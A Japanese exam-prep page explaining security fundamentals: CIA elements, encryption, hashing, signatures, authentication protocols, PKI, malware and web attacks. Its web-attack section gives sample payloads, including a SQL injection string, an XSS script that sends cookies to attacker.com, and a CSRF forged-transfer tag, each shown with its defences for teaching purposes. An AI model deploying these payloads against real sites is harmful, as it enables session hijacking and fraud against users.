情報セキュリティの基礎
CIA + 4要素、暗号化、ハッシュ、電子署名、認証、マルウェア、Web攻撃、対策技術を整理する
このページの役割
このページは、情報セキュリティの基礎 を整理するページです。
情報セキュリティとは、単に「攻撃を防ぐ」ことではなく、「データを正確に、許可された人だけが、必要な時にアクセスできる状態を保つ」ことです。そのために、何を守るのか(目的)、どうやって守るのか(技術)、何から守るのか(脅威) の 3 つの視点が必要です。
このページでは、まず CIA と 4 要素 で「守る対象」を定義し、次に 暗号化 / ハッシュ / 電子署名 / 認証 で「守る方法」を学び、最後に マルウェア / Web 攻撃 / その他脅威 で「守るべき対象」を整理します。
学習のポイント
- まず
CIAと真正性 / 責任追跡性 / 否認防止 / 信頼性の 7 要素を、それぞれ「何のために必要か」で理解する - 次に
共通鍵暗号と公開鍵暗号の仕組みと、なぜ鍵の個数が異なるのかを理解する - そのうえで
ハッシュ関数とデジタル署名が「どの要素を実現するのか」を対応させる 認証の 3 要素と多要素認証の組み合わせを、それぞれの強度で区別するFAR / FRR / EERを、生体認証の精度指標として読み分けるLDAP / RADIUS / Kerberosの役割の違いを切り分けるマルウェア / SQL インジェクション / XSS / CSRFを、「何を狙うのか」と「どう防ぐのか」で分類するネットワークセキュリティ対策とゼロトラストの考え方の違いを理解するタイムスタンプと電子署名の役割の違いを区別する- ISMS のリスク分析アプローチの違いを比較する
試験で何が問われるか
CIAと真正性 / 責任追跡性 / 否認防止 / 信頼性の 7 要素の違いを説明できるか共通鍵暗号と公開鍵暗号の仕組みを述べ、n人での鍵個数を計算できるかハッシュ関数とデジタル署名の 5 ステップの手順を述べ、秘密鍵と公開鍵の使用順序を正確に言えるか認証の 3 要素(知識 / 所持 / 生体)の違いと、多要素認証が何をもたらすかを説明できるかFAR / FRR / EERの定義とトレードオフを説明できるかLDAP / RADIUS / Kerberosの役割の違いを区別できるかマルウェア / SQL インジェクション / XSS / CSRFの攻撃対象と防御策を正確に対応させられるかファイアウォール / IDS / IPS / WAF / VPNの位置づけと役割の違いを説明できるか従来の境界型防御とゼロトラストの基本方針の違いを理解しているかタイムスタンプと電子署名の役割の違いを説明できるか- ISMS のリスク分析アプローチの違いを比較できるか
定義と仕組み
セキュリティの 3 要素 (CIA) と 4 要素
情報セキュリティで守る対象は、次の 7 つです。まずは「何のために必要か」に着目して理解することが重要です。
| 要素 | 英語 | 説明 | 実生活の例 |
|---|---|---|---|
| 機密性 | Confidentiality | 許可された人だけが情報にアクセスできること | メールの内容を本人と受信者だけが見られる |
| 完全性 | Integrity | 情報が改ざんされていないこと、正確なままであること | ダウンロードしたファイルが送信時と同じ内容である |
| 可用性 | Availability | 必要な時に情報やサービスが使える状態であること | Webサイトがアクセス可能で、データベースはいつでも照会できる |
| 真正性 | Authenticity | 通信相手や情報の出所が本物であること | 受け取ったメールが本当にその人から来たのか確認できる |
| 責任追跡性 | Accountability | 誰が何をしたか記録に残り、追跡できること | 誰がいつどのデータを変更したかログに記録される |
| 否認防止 | Non-repudiation | 本人が行動や通信を後で否定できないこと | 送信した電子メールについて「送っていない」と言い張れない |
| 信頼性 | Reliability | システムが意図した通りに正常に機能し続けること | プログラムが想定外の動作をしない |
それぞれの技術との対応
これらの 7 要素は、異なる技術で実現されます:
- 暗号化 = 機密性 を実現(データを読めなくする)
- ハッシュ関数 = 完全性 を実現(改ざんを検知する)
- 電子署名 = 真正性 と 否認防止 を同時に実現(出所を証明し、送信者が否定できなくする)
- 認証技術 = 真正性 を実現(相手が本当にその人か確認する)
- ファイアウォール / IDS / IPS = 可用性 を実現(攻撃を防ぎ、システムが使える状態を保つ)
このように、複数の技術を組み合わせることで、初めて包括的なセキュリティが実現されます。
暗号化方式
暗号化とは、元のデータ(平文)を特定の規則(鍵)に基づいて読めない形(暗号文)に変換し、受信者だけが復号化できるようにする技術です。暗号化には 2 つの方式があり、それぞれメリット・デメリットが異なります。
共通鍵暗号 (対称鍵暗号)
同じ鍵で暗号化と復号化を行う方式です。 送信者が「あなたの鍵は 2024」で暗号化すれば、受信者も「鍵 2024」で復号化します。
| 特徴 | 詳細 | なぜ重要か |
|---|---|---|
| 仕組み | 送信者と受信者が同じ鍵を持つ | シンプルで理解しやすい |
| 処理速度 | 速い | 大容量データの暗号化に適する |
| 鍵配送 | 事前に安全に鍵を共有する必要がある(鍵配送問題) | 人数が増えると鍵管理が複雑になる |
| n 人での鍵個数 | n(n-1)/2 本 | 組織内での運用が難しくなる |
| 代表例 | AES、3DES | AES は現在推奨される標準 |
鍵配送問題とは何か
10 人が各自 1 対 1 で安全に通信したいとします。AさんとBさんが通信するとき、2人だけが知っている秘密鍵が必要です。しかし、AさんとCさんが通信するときは別の秘密鍵が必要です。この秘密鍵を「事前にどうやって安全に共有するか」が問題になります。
鍵の個数計算例(10 人の場合)
10 人が各自 1 対 1 で通信する場合、それぞれのペアに異なる鍵が必要です:
- ペアの数 = C(10,2) = 10 × 9 ÷ 2 = 45 本
Aさんが Bさんと通信するための鍵を、CさんやDさんと共有することはできません(そうしたら、CさんがAさんとBさんの通信を盗聴できてしまいます)。つまり、人数が増えると必要な鍵の本数が急速に増え、管理が困難になります。
公開鍵暗号 (非対称鍵暗号)
異なる 2 つの鍵を使う方式です。 公開鍵(世界中に公開してよい)と秘密鍵(自分だけが持つ)のペアを使い分けます。
| 特徴 | 詳細 | なぜ重要か |
|---|---|---|
| 仕組み | 公開鍵で暗号化 → 秘密鍵で復号化 | 鍵を事前に共有する必要がない |
| 処理速度 | 遅い | 小容量データやハンドシェイク段階での使用が多い |
| 鍵配送 | 公開鍵は「公開」するので配送問題がない | インターネット上で誰にでも配布可能 |
| n 人での鍵個数 | 2n 個(各人が公開鍵 1 + 秘密鍵 1) | 人数が増えても鍵管理がシンプル |
| 代表例 | RSA、楕円曲線暗号(ECC) | ECC は計算効率が良く、次世代標準 |
公開鍵暗号が解決する問題
従来の共通鍵暗号では、秘密鍵を事前に安全に交換する必要がありました。しかし、公開鍵暗号なら、公開鍵はインターネットで自由に公開でき、受信者だけが秘密鍵を持ちます。つまり、初めて会う人とも安全に通信できるようになります。
鍵の個数計算例(10 人の場合)
10 人が各自、公開鍵 1 つ + 秘密鍵 1 つを持ちます:
- 鍵の個数 = 2 × 10 = 20 個
AさんがB〜Jさんと通信する場合、各人の公開鍵さえあればよく、秘密鍵を共有する必要はありません。Bさんの公開鍵は世界中に知られていてもかまいません。Bさんだけが自分の秘密鍵を持っているからです。
ハイブリッド暗号 (実際の運用)
現実には、共通鍵暗号と公開鍵暗号の両方を使い分けます。
これが ハイブリッド暗号 です。理由は以下の通りです:
- 共通鍵暗号 = 高速だが、鍵配送が問題
- 公開鍵暗号 = 鍵配送が不要だが、処理が遅い
そこで、次のように組み合わせます:
- 通信開始時:公開鍵暗号で、送受信者が「この通信で使う共通鍵」を安全に交換する(鍵交換フェーズ)
- データ送信:その共通鍵を使って、大容量の実際のデータを高速に暗号化・復号化する(データ転送フェーズ)
この組み合わせを ハイブリッド暗号 と呼びます。SSL/TLS や HTTPS、金融機関のインターネットバンキングなど、現在のほぼ全ての安全な通信がこの方式です。
ハイブリッド暗号の利点
- 鍵交換は安全(公開鍵暗号)
- データ転送は高速(共通鍵暗号)
- 初対面の相手ともインターネット経由で安全に通信可能
暗号化 / 圧縮 / 符号化 の違い
過去問では、暗号化 と 圧縮、符号化 をわざと近い表現で並べてきます。ここは 何のために変換するのか で切ると迷いにくくなります。
| 用語 | 主目的 | 元に戻せるか | 典型例 | 問題文の合図 |
|---|---|---|---|---|
| 暗号化 | 秘密にする | 鍵があれば戻せる | AES、RSA、TLS | 盗聴防止、機密性、復号、鍵 |
| 圧縮 | 容量を減らす | 可逆圧縮は戻せる。非可逆圧縮は完全には戻らない | ZIP、JPEG、MP3 | 容量削減、転送効率、ファイルサイズ |
| 符号化 | 扱いやすい表現に変える | ルールに従えば戻せる | 文字コード、Base64、音声のデジタル化 | 表現変換、コード化、文字コード、データ形式 |
暗号化 は秘密保持が目的で、圧縮 は効率化が目的、符号化 は表現形式の変換が目的です。圧縮しただけでは秘密にならない、Base64 にしただけでは暗号化ではない と切れるようにしてください。
ハッシュ関数
ハッシュ関数とは、任意の長さの入力から固定長の値(ハッシュ値)を生成する一方向関数です。 暗号化とは異なり、元のデータに戻すことはできません。その代わり、データが少しでも変わると、全く異なるハッシュ値が生成されます。
ハッシュ関数の 3 つの重要な特性
| 特性 | 説明 | 実生活の例 |
|---|---|---|
| 一方向性 | ハッシュ値から元のデータを復元できない(復号化不可) | パスワードのハッシュ値を見ても、元のパスワードがわからない |
| 衝突耐性 | 異なるデータから同じハッシュ値が出にくい(強衝突耐性) | 2 人の異なるパスワードが同じハッシュ値になることは(ほぼ)ない |
| 変更検知性 | データが 1 文字変わると、ハッシュ値が全く変わる | 改ざんされたデータを見つけやすい |
なぜ一方向なのか?
暗号化は「元のデータに戻すこと」が目的ですが、ハッシュ関数は「データが改ざんされていないことを検証すること」が目的です。だから、一方向でいいのです。むしろ、復号化できないからこそ、パスワードのように「本人しか知らない秘密」を安全に保管できます。
| 関数 | ハッシュ値の長さ | 用途 | 現在の評価 | 使用推奨 |
|---|---|---|---|---|
| MD5 | 128 ビット | パスワードハッシュ、ファイル整合性確認(古い) | 脆弱(衝突攻撃が可能) | 新規利用禁止 |
| SHA-1 | 160 ビット | デジタル署名、TLS/SSL(古い) | 脆弱(衝突が報告されている) | 新規利用禁止 |
| SHA-256 | 256 ビット | セキュリティが必要な場面全般(推奨) | 強(十分に安全) | 現在推奨 |
| SHA-3 | 224/256/384/512 ビット | 最新仕様 | 強(将来の標準) | 次世代標準 |
ハッシュ関数を使わない場合の危険性
もし企業が「パスワード = db_password」として、元のパスワードをデータベースに保存していたら、ハッカーに盗まれたとき、全員のパスワードが漏洩してしまいます。しかし、ハッシュ値 SHA-256(db_password) が盗まれても、元のパスワードを復元することはできないため、他のシステムへの被害を最小限に抑えられます。
用途例
- パスワード保存:
SHA-256(ユーザーのパスワード)をデータベースに保存。ハッキングされても元のパスワードは復元不可 - ファイル整合性確認:ダウンロード開始前に公開されているハッシュ値と、ダウンロード後のハッシュ値を比較。改ざんされていれば値が異なる
- デジタル署名:ドキュメント全体を暗号化するのではなく、そのハッシュ値を暗号化・署名する(高速)
デジタル署名
デジタル署名とは、ドキュメントのハッシュ値を秘密鍵で暗号化し、「このドキュメントは本当に私が送信した(否認防止)」「改ざんされていない(完全性)」「送信者は本物である(真正性)」ことを証明する仕組みです。
なぜ必要か
実生活で重要な契約書には署名をします。手書きの署名は「この人が確かに署名した」という証拠になります。デジタル世界でも同じことが必要です。電子メールを送ったあと、「いや、僕は送っていない」と言い張られることを防ぐためです。
5 ステップの手順
デジタル署名は送信者側と受信者側で異なる処理をします:
| ステップ | 操作 | 使用する鍵 | 説明 |
|---|---|---|---|
| 1. ハッシュ生成(送信者) | ドキュメント → ハッシュ関数 | なし | ドキュメント全体を要約(指紋のようなもの) |
| 2. ハッシュを秘密鍵で暗号化(送信者) | ハッシュ値 H → 秘密鍵で暗号化 | 送信者の秘密鍵 | これが「デジタル署名 S」 |
| 3. ドキュメント + 署名を送信(送信者) | ドキュメント + デジタル署名 S を受信者に送信 | なし | インターネット経由で送信 |
| 4. ハッシュ生成(受信者) | 受信したドキュメント → ハッシュ関数 | なし | 受信したドキュメントから新しいハッシュ値 H' を生成 |
| 5. 署名を公開鍵で復号化(受信者) | デジタル署名 S → 送信者の公開鍵で復号化 | 送信者の公開鍵 | H' と復号化した値 H'' を比較 |
署名検証の結果
- H' == H'' → 署名は有効(ドキュメントは改ざんされておらず、送信者は本物)
- H' ≠ H'' → 署名は無効(ドキュメントが改ざんされた、または送信者が本物ではない)
暗号化との違い(鍵の使用順序がポイント)
これが試験で最も混同されるポイントです:
| 目的 | 鍵の使用順序 | 秘密鍵の所有者 | 実現する要素 |
|---|---|---|---|
| 機密性(暗号化) | 公開鍵で暗号化 → 秘密鍵で復号化 | 受信者(データを読みたい人) | 「許可された人だけがデータを読める」 |
| 真正性・否認防止(デジタル署名) | 秘密鍵で暗号化 → 公開鍵で復号化 | 送信者(署名する人) | 「この人が確かに送信した」「改ざんされていない」 |
なぜ暗号化と署名で鍵の使用順序が逆なのか
- 暗号化:受信者だけが秘密鍵を持っているので、受信者だけが復号化できる(読める)
- 署名:送信者だけが秘密鍵を持っているので、送信者だけが署名できる(本人確認)
つまり、「秘密鍵を持っている人」が異なるため、鍵の使用順序が自動的に決まるのです。
認証技術
認証とは、ユーザーが「本当にその人であるか」を確認するプロセスです。 これは「その人にアクセス権があるか」を決める認可とは異なります。まず本人であることを確認(認証)してから、その人に何ができるかを決める(認可)という順序です。
認証の強度を上げるには、複数の異なる要素を組み合わせることが有効です。
3 つの認証要素
認証には、大きく 3 つの要素があります:
| 要素 | 英語 | 説明 | 例 | 強度 |
|---|---|---|---|---|
| 知識要素 | Something you know | ユーザーが知っている情報 | パスワード、秘密の質問、PIN | 弱い(他人に知られやすい) |
| 所持要素 | Something you have | ユーザーが物理的に持っているもの | スマートフォン、セキュリティキー、ICカード、トークン | 中程度(紛失や盗難のリスク) |
| 生体要素 | Something you are | ユーザーの身体的特性 | 指紋、顔、虹彩、音声、静脈認証 | 強い(複製困難) |
各要素の仕組み
- 知識要素の例:ユーザーがログイン画面にパスワードを入力
- 所持要素の例:スマートフォンに SMS で 6 桁の認証コードが届く、認証アプリが表示する時間ベースコード
- 生体要素の例:スマートフォンの指紋認証、顔認証で本人確認
多要素認証 (MFA: Multi-Factor Authentication)
複数の異なる要素を組み合わせて認証強度を高めます。
| 認証方式 | 構成要素 | 強度レベル | 実装例 | 適用場面 |
|---|---|---|---|---|
| 単一要素 | 知識のみ | 低 | パスワードだけ | 非推奨(セキュリティが不十分) |
| 2 要素認証 | 知識 + 所持 | 中 | パスワード + SMS コード | SNS、メール、オンラインショップ(標準的) |
| 2 要素認証 | 知識 + 生体 | 高 | パスワード + 指紋認証 | スマートフォン解除、銀行アプリ |
| 2 要素認証 | 所持 + 生体 | 高 | セキュリティキー + 指紋 | 社内 VPN、機密データアクセス |
| 3 要素認証 | 知識 + 所持 + 生体 | 最高 | パスワード + セキュリティキー + 指紋 | 金融機関、政府機関、機密情報へのアクセス |
多要素認証が効果的な理由
1 つの認証要素が破られてもダメージを最小限に抑えられます:
- パスワードが流出 → SMS コードがあれば不正ログインを防げる
- スマートフォン紛失 → パスワードがあれば完全には乗っ取られない
- 指紋が複製される → パスワードもあれば追加防御層になる
よくある混同:「多段階認証」と「多要素認証」は違う
- 多段階認証:パスワード → セキュリティの質問 → メール認証(すべて知識要素の組み合わせ)→ 強度が上がらない
- 多要素認証:パスワード(知識) + SMS コード(所持)→ 強度が上がる
試験では「パスワード + 秘密の質問」を「多要素認証か」と聞かれたら「いいえ」が正解です(どちらも知識要素)。
生体認証の評価指標 ─ FAR・FRR・EER
生体認証は「本人かどうか」を判定するため便利ですが、判定を厳しくすると本人も弾きやすくなり、甘くすると他人も通しやすくなります。このトレードオフを表すのが次の 3 指標です。
| 指標 | 日本語 | 意味 | 低いほど良い観点 |
|---|---|---|---|
| FAR | 他人受入率 / 他人受理率 | 他人なのに本人と判定してしまう割合 | セキュリティ |
| FRR | 本人拒否率 | 本人なのに他人と判定してしまう割合 | 利便性 |
| EER | 等価エラー率 | FAR と FRR が等しくなる点のエラー率 | システム全体の性能比較 |
読み方のコツ
- 判定を厳しくする → FAR は下がる が FRR は上がる
- 判定を緩くする → FRR は下がる が FAR は上がる
- EER が低いほど、バランスの良い認証方式と評価しやすい
不正者を通したくない が論点なら FAR、本人を弾きすぎないか が論点なら FRR を見ます。
ワンタイムパスワード / チャレンジレスポンス / リスクベース認証
認証方式の設問では、何を送るのか、毎回同じか、追加認証の条件は何か を見ると切り分けやすくなります。
| 方式 | 仕組み | 典型例 | 問題文の合図 |
|---|---|---|---|
| ワンタイムパスワード(OTP) | 毎回異なる使い捨てパスワードで認証する | 認証アプリの 6 桁コード、SMS コード | 一度しか使えない、毎回変わる、使い捨て |
| チャレンジレスポンス認証 | サーバが乱数(チャレンジ)を出し、利用者側が秘密情報を使って応答を計算する | パスワードそのものを送らない認証 | 乱数、チャレンジ、応答、秘密情報を直接送らない |
| リスクベース認証 | 端末、場所、時刻などの状況を見て、普段と違うときだけ追加確認する | 海外からのログイン時に追加コード要求 | 普段と違う環境、追加認証、場所・端末・時間で判断 |
OTP は 毎回違う値、チャレンジレスポンス は 秘密そのものを送らない仕組み、リスクベース認証 は 状況に応じて認証強度を変える考え方 です。一度認証したら全システムで再認証不要 は SSO の話であり、OTP とは別です。
シングルサインオン (SSO) と関連技術
複数のサービスに 1 回の認証でアクセスできる仕組みです:
| プロトコル | 位置づけ | 説明 | 用途 | 実装例 |
|---|---|---|---|---|
| SAML (Security Assertion Markup Language) | 認証情報を伝達 | 認証情報を XML 形式で送信 | エンタープライズ SSO(社内システム連携) | 大企業の社員が ID 1 つで複数の社内システムにアクセス |
| OAuth 2.0 | 認可情報を委譲 | 他のサービスがあなたのリソースに限定的にアクセスすることを許可 | サードパーティアプリのアクセス権限付与 | 「Google で登録」「Facebook でログイン」 |
| OpenID Connect | 認証 + 認可 | OAuth 2.0 に認証機能を追加 | 認証と認可の両方が必要な場面 | モダンな SSO |
| FIDO (Fast IDentity Online) | パスワードレス認証 | 生体認証 + セキュリティキーで強力に認証 | パスワード不要な次世代認証 | Windows Hello、生体認証デバイス |
SAML と OAuth 2.0 の違いに注意
- SAML:「あなた本当に A さんですか?」(認証)
- OAuth 2.0:「Google さん、この人があなたの Google Drive にアクセスすることを許可する」(認可)
OAuth は認証ではなく認可なので、「Google でログイン」と言われても、実はその背後で別の認証技術が使われている場合が多いです。
SAML / OAuth 2.0 / OpenID Connect / LDAP / RADIUS / Kerberos を 1 枚で切る
認証関連の設問では、ユーザー情報を持つ仕組み、認証結果を他サービスへ渡す仕組み、ネットワーク接続時の認証 が混在します。どの層で何をしているか を分けると崩れにくくなります。
| 用語 | 主な役割 | 何を扱うか | 典型的な使われ方 | 問題文の合図 |
|---|---|---|---|---|
| SAML | 認証結果の連携 | 「この人は認証済み」というアサーション | 社内システム間の SSO | SSO、認証情報を引き回す、企業内連携 |
| OAuth 2.0 | 認可の委譲 | 「この範囲だけアクセスしてよい」という権限 | 外部サービスへの API 利用許可 | 権限委譲、トークン、外部アプリ連携 |
| OpenID Connect | 認証 + 認可 | OAuth 2.0 に本人確認を追加 | モダンなログイン基盤、ID 連携 | ログイン、ID トークン、認証も必要 |
| LDAP | ユーザー情報の保管・検索 | ID、所属、属性情報 | 社員ディレクトリ、認証基盤の情報源 | ディレクトリ、ユーザー属性、階層管理 |
| RADIUS | ネットワーク接続時の認証連携 | 認証要求、認可結果、課金情報 | Wi-Fi、VPN、リモートアクセス | アクセスサーバ、無線 LAN、VPN 認証 |
| Kerberos | チケットベース認証 | 事前発行された認証チケット | Active Directory、社内 SSO | チケット、相互認証、AD |
ログインに使う と書いてあっても、実際に問われているのが 認証そのもの なのか 権限委譲 なのか 認証基盤のユーザー台帳 なのかは別です。外部アプリに Google Drive への限定アクセスを許可 なら OAuth 2.0、社員 ID を管理する台帳 なら LDAP、一度の認証で複数システムへ入る なら SAML または OpenID Connect を疑う順番が安全です。
FIDO / パスキー / ワンタイムパスワード / SSO を切り分ける
近年の過去問では、パスワードレス認証、ワンタイムコード、一度の認証で複数サービスへ入る仕組み を混ぜてきます。ここは 何を使って本人確認するのか と 認証結果をどう使うのか を分けるのがコツです。
| 用語 | 位置づけ | 何をしているか | 問題文の合図 |
|---|---|---|---|
| FIDO | パスワードレス認証の標準群 | 公開鍵暗号と認証器で本人確認する | FIDO2、WebAuthn、フィッシング耐性 |
| パスキー | FIDO ベースの認証情報 | 複数デバイスで同期される認証情報を用いる | 複数端末で同じ認証情報、パスワード不要 |
| ワンタイムパスワード | 使い捨てコード認証 | 毎回異なるコードを使う | SMS、認証アプリ、6桁コード |
| SSO | 認証結果の再利用 | 一度の認証で複数システムへ入る | 再ログイン不要、複数システム |
パスキー は FIDO の考え方に基づく認証情報であり、OTP のように毎回コードを入力する方式とは別です。また、SSO は認証を楽にする仕組みであって、パスワードレス そのものではありません。顔認証や指紋認証は、端末上でパスキーを解放する手段として使われることがありますが、生体認証 = パスキー と同一視しないようにしてください。
LDAP・RADIUS・Kerberos の位置づけ
認証基盤の問題では、誰の情報を持つか、誰が認証するか、どうやってチケットを渡すか を切り分けると混同しにくくなります。
| 用語 | 役割 | 何を持つか / 何をするか | 典型的な使われ方 |
|---|---|---|---|
| LDAP | ディレクトリサービス | ユーザー ID、所属、属性情報を階層構造で管理 | 社内アカウント台帳、SSO のユーザー情報源 |
| RADIUS | 認証・認可・課金のプロトコル | ネットワーク機器から認証要求を受け、認証サーバーで判定 | Wi-Fi、VPN、リモートアクセス |
| Kerberos | チケットベース認証 | パスワードを都度送らず、発行済みチケットで本人確認 | Active Directory 環境、社内システム認証 |
試験での見分け方
利用者情報を保存・検索する仕組みなら LDAPネットワーク機器と認証サーバーのやり取りなら RADIUSチケット、シングルサインオン、相互認証が出れば Kerberos を疑います
公開鍵基盤 (PKI: Public Key Infrastructure)
公開鍵暗号には 1 つの問題があります。「その公開鍵は本当にその人のものなのか」をどうやって確認するのか、ということです。
例えば、あなたが Amazon から「公開鍵」を受け取ったとします。しかし、その鍵が本当に Amazon のものなのか、攻撃者が偽造した鍵ではないのか、どうやって確認しますか? PKI は、この「公開鍵の身元確認」を実現するための体制です。
| 要素 | 役割 | 実生活との類似 |
|---|---|---|
| 認証局 (CA: Certification Authority) | 「この公開鍵は本当にこの人のものです」という電子証明書を発行し、失効管理 | 公的機関が発行する身分証明書(パスポート、運転免許証) |
| 登録局 (RA: Registration Authority) | 申請者の身元を確認し、CA に申請を仲介 | 市役所や警察署で身分確認を行う職員 |
| 電子証明書 | ユーザー情報、公開鍵、有効期限、CA の電子署名を含むデータ | パスポートや運転免許証そのもの |
| CRL (Certificate Revocation List) | 失効した証明書のリスト(例:鍵が漏洩した時) | 紛失・盗難が報告された免許証の失効リスト |
| OCSP (Online Certificate Status Protocol) | 証明書の有効性をリアルタイムで確認するプロトコル | データベースで「この免許証はまだ有効か」をその場で確認 |
PKI の仕組みの流れ
- 証明書申請:Webサイト運営者が CA に「この公開鍵は僕のものです、証明書をください」と申請
- 身元確認:CA(または RA)が「本当にこの組織が存在するのか」を確認
- 電子証明書発行:CA が「この公開鍵は ✓✓✓ 会社のもの」と電子署名して証明書を発行
- ブラウザによる検証:あなたが Amazon にアクセスすると、ブラウザが Amazon から証明書を受け取り、CA の署名で検証(「この証明書は本物か」)
- アドレスバーの表示:検証が成功すれば、アドレスバーが緑色になり、鍵マークが表示される
HTTPS 通信の背後にある PKI
あなたが https://amazon.co.jp にアクセスするとき、実は以下が起きています:
- Amazon は「Amazon の公開鍵です」という電子証明書を提示
- 大手 CA(VeriSign など)が電子署名で「本物です」と保証
- あなたのブラウザが「CA の署名は有効か」を確認
- 確認できれば、その公開鍵で通信を暗号化
電子署名 / 電子証明書 / 認証局 / PKI の切り分け
電子署名 と 電子証明書 は近い場所で使われるため混同しやすいですが、役割は別です。署名する道具 と 公開鍵の身元証明書 を分けて考えます。
| 用語 | 何者か | 主な役割 | ひとことで言うと |
|---|---|---|---|
| 電子署名 | データに付ける署名情報 | 作成者本人性、改ざん検知、否認防止を示す | 「この文書は私が出した」 |
| 電子証明書 | 公開鍵と本人・組織を結びつける証明書 | その公開鍵が誰のものかを示す | 「この公開鍵は確かにこの会社のもの」 |
| 認証局(CA) | 証明書を発行・失効管理する第三者機関 | 電子証明書に信頼を与える | 「身元確認して証明書を出す役所」 |
| PKI | 認証局や証明書を含む運用基盤全体 | 公開鍵の身元確認を成り立たせる | 「公開鍵を信頼して使うための体制」 |
順番で言うと、PKI という体制の中で 認証局 が 電子証明書 を発行し、その証明書を使って相手の公開鍵を信頼できるようになり、その先で 電子署名 の検証や HTTPS の安全な通信が成立します。
CRL / OCSP の違い
証明書に関する設問では、失効した証明書をどう確認するか が問われることがあります。ここは、一覧をまとめて配るか、その場で問い合わせるか の違いで覚えると切りやすいです。
| 用語 | 何をするか | 向いている使い方 | 注意点 |
|---|---|---|---|
| CRL | 失効した証明書の一覧を配布する | まとめて定期確認したいとき | 配布後に最新状態とずれることがある |
| OCSP | 証明書 1 件ごとに有効性を問い合わせる | リアルタイムに確認したいとき | 問い合わせ先への通信が必要 |
この証明書は今も有効か をその場で確認するなら OCSP、失効済み一覧を見て照合する なら CRL が基本です。どちらも 誰の証明書か を証明するものではなく、すでに出ている証明書がまだ使えるか を確認する仕組みです。
タイムスタンプと電子保存
タイムスタンプ は、ある電子文書がその時刻に存在し、その後改ざんされていないことを第三者が証明する仕組み です。電子署名が 誰が作成したか に強いのに対し、タイムスタンプは いつ存在していたか と その後の改ざん有無 に強いという違いがあります。
| 観点 | 電子署名 | タイムスタンプ |
|---|---|---|
| 主に証明したいこと | 作成者本人性、否認防止 | 存在時刻、改ざん防止 |
| 中核技術 | 秘密鍵による署名、公開鍵で検証 | ハッシュ値と時刻情報を第三者が証明 |
| 典型用途 | 契約、申請、証明書発行 | 電子文書保存、証跡管理、長期保存 |
過去問では電子帳簿保存法の旧要件を題材に、タイムスタンプが必要か を問う問題もありました。受験上はまず、タイムスタンプは「時刻証明」、電子署名は「本人証明」 と切ることが重要です。実務での細かな保存要件は制度改正があるため、最新要件を個別に確認してください。
暗号化・認証まとめ
暗号化と認証の使い分け
- 暗号化 (encryption) = データを読めなくする(機密性を守る)
- 認証 (authentication) = 通信相手が本物か確認する(真正性を確認する)
- デジタル署名 = ハッシュ値を秘密鍵で署名し、真正性と否認防止を実現
- ハッシュ関数 = データの改ざんを検知(完全性確認)
マルウェアと脅威
マルウェアの種類
| 種類 | 特徴 | 感染方法 | 影響 |
|---|---|---|---|
| ウイルス | 自己増殖する。プログラムに寄生 | 感染ファイル実行時 | データ破壊、情報盗取 |
| ワーム | 自己増殖する。独立したプログラム | ネットワーク経由(パッチ未適用など) | ネットワーク通信の大量発生 |
| トロイの木馬 | 自己増殖しない。無害に見えるが裏で悪意ある処理 | ダウンロード、メール添付 | 情報盗取、遠隔操作 |
| ランサムウェア | ファイルを暗号化し、復号化キーの身代金を要求 | メール添付、脆弱性悪用 | 事業停止、経済的被害 |
| スパイウェア | ユーザーの行動や情報を収集 | フリーソフト、広告サイト | プライバシー侵害、スロー化 |
| ボット(ボットネット) | 遠隔から操作される。DDoS 攻撃に悪用 | ワーム+トロイの木馬のような感染 | 攻撃のリソース化 |
Web 攻撃
Web 攻撃を理解する最大のポイントは「何を狙うのか」を見極めることです。 SQL インジェクション、XSS、CSRF は一見似ていますが、攻撃対象が全く異なります。
主要な 3 つの Web 攻撃比較
| 攻撃 | 攻撃対象 | 仕組み | 防御策 | つまずきやすさ |
|---|---|---|---|---|
| SQL インジェクション | サーバー側のデータベース | 入力欄に SQL コマンドを混ぜ込み、不正な SQL を実行させる | プリペアドステートメント、入力値の検証 | DB を狙う |
| XSS (クロスサイトスクリプティング) | クライアント側(他のユーザーのブラウザ) | 入力欄に JavaScript を埋め込み、他のユーザーが閲覧時にスクリプトを実行させる | 出力値のエスケープ、CSP ヘッダ | ブラウザを狙う |
| CSRF (クロスサイトリクエストフォージェリ) | 認証済みユーザーの権限と信頼性 | 別サイトから、ユーザーが認証済みの状態を悪用して不正リクエストを送信 | CSRF トークン検証、SameSite クッキー | ユーザーのセッションを狙う |
なぜ 3 つに分けて考えるのか
1 つの防御策がすべての攻撃に対応することはできません。攻撃対象が異なるため、防御策も異なるからです:
- SQL インジェクションはプログラムのロジックレベルで防ぐ
- XSS はブラウザでの実行を防ぐ
- CSRF はリクエストの正当性を検証して防ぐ
詳細な仕組みと具体例
1. SQL インジェクション
「データベースを狙い、不正なデータを取得・削除・改ざんする」攻撃です。
具体的な攻撃例
ユーザー名入力欄に以下を入力:' OR '1'='1
→ SQL: SELECT * FROM users WHERE name='' OR '1'='1'
→ '1'='1' は常に true なので、全ユーザーの情報が返される防御策
- プリペアドステートメント:SQL の構造とデータを分離して実行(最も有効)
- 入力値の検証:英数字のみ許可するなど、入力内容を制限
- エスケープ処理:特殊文字を無害化
2. XSS (クロスサイトスクリプティング)
「他のユーザーのブラウザで悪意あるスクリプトを実行させる」攻撃です。
具体的な攻撃例
ショッピングサイトのコメント欄に以下を入力:
<script>fetch('https://attacker.com?cookie='+document.cookie)</script>
→ 他のユーザーがそのページを訪問
→ ブラウザが JavaScript を実行
→ その人の Cookie(セッションID など)が攻撃者に送られる防御策
- 出力時のエスケープ:HTML タグを無害化(
<→<など) - Content Security Policy (CSP) ヘッダ:ブラウザにどのスクリプトを実行するか指定
- 入力値の検証:HTML タグを許可しない
3. CSRF (クロスサイトリクエストフォージェリ)
「ユーザーが気付かないうちに、認証済みセッションを使って不正リクエストを送信させる」攻撃です。
具体的な攻撃例
1. あなたが銀行アプリでログイン → セッション ID が Cookie に保存
2. あなたが攻撃者のサイトを訪問
3. そのサイトの HTML に以下が埋め込まれている:
<img src="https://bank.com/transfer?to=attacker&amount=1000000" />
4. ブラウザがこのリクエストを自動実行
5. あなたの Cookie(セッション ID)が一緒に送られる
6. 銀行のサーバーは「このセッションは認証済みだ」と認識 → 送金実行防御策
- CSRF トークン検証:GET や POST リクエストに、サーバーが生成した「ワンタイムトークン」を含める。攻撃者は事前にこのトークンを知らない
- SameSite クッキー属性:Cookie を「同じサイトからのリクエストのみ」に限定
- ダブルサブミット法:リクエストの body と header に同じ値を含めさせ、サーバーで一致を確認
WAF / CSP / SameSite をどう切り分けるか
Web セキュリティでは、どれも対策っぽい という覚え方だと崩れます。ここは どこで効くか を先に固定してください。
